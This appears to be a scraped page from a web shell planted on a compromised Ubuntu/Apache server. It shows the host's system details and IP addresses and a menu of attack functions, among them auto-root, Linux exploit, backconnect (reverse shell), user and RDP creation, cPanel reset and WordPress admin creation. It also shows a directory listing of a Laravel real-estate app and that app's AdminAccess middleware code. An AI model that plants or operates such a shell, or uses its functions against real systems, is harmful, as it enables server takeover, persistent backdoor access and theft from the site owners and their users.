Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.71.203.60
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
app /
Http /
Middleware /
[ HOME SHELL ]
Name
Size
Permission
Action
AdminAccess.php
971
B
-rwxr-xr-x
Authenticate.php
577
B
-rwxr-xr-x
EncryptCookies.php
307
B
-rwxr-xr-x
IsAdmin.php
776
B
-rwxr-xr-x
PreventRequestsDuringMaintenan...
366
B
-rwxr-xr-x
RedirectIfAuthenticated.php
1018
B
-rwxr-xr-x
StoreLastPage.php
477
B
-rwxr-xr-x
TrimStrings.php
381
B
-rwxr-xr-x
TrustHosts.php
379
B
-rwxr-xr-x
TrustProxies.php
649
B
-rwxr-xr-x
ValidateSignature.php
460
B
-rwxr-xr-x
VerifyCsrfToken.php
310
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AdminAccess.php
<?php namespace App\Http\Middleware; use Closure; use Illuminate\Support\Facades\Auth; use Illuminate\Support\Facades\Log; class AdminAccess { public function handle($request, Closure $next) { $user = Auth::user(); // Log the roles and permissions to check if superadmin is detected // Log::info('User Role:', ['role' => $user->roles->pluck('name')]); // Log::info('User Permissions:', ['permissions' => $user->permissions->pluck('name')]); // Check if the user has the superadmin role if ($user && $user->hasRole('superadmin')) { return $next($request); } // Check if the user has the required permission if ($user && $user->can('admin_access')) { return $next($request); } // Log and abort if unauthorized // Log::info('Unauthorized access attempt by user:', ['user_id' => $user->id]); abort(403, 'Unauthorized access'); } }
Close